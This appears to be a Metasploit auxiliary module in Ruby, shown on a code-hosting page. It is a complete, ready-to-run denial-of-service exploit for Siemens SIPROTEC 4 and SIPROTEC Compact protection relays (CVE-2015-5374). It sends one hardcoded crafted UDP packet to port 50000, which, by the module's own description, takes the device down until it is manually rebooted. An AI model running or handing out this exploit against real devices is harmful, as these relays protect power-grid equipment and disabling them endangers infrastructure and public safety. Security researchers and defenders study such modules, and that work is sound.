Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Udp
8
  include Msf::Auxiliary::Dos
9
    def initialize(info = {})
10
        super(
11
          'Name'           => 'Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service',
12
          'Description'    => %q{
13
             This module sends a specially crafted packet to port 50000/UDP
14
             causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.
15
             A manual reboot is required to return the device to service.
16
             CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.
17
            },
18
          'Author'         => [ 'M. Can Kurnaz' ],
19
          'License'        => MSF_LICENSE,
20
          'Version'        => '$Revision: 1 $',
21
          'References'     =>
22
            [
23
              [ 'CVE' '2015-5374' ],
24
              [ 'EDB', '44103' ],
25
              [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-15-202-01' ]
26
            ])
27
        register_options([Opt::RPORT(50000),])
28
  end
29
  def run
30
      connect_udp
31
      pckt = "\x11\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x9e"
32
      print_status('Sending DoS packet...')
33
      udp_sock.put(pckt)
34
      disconnect_udp
35
  end
36
end
37

38

39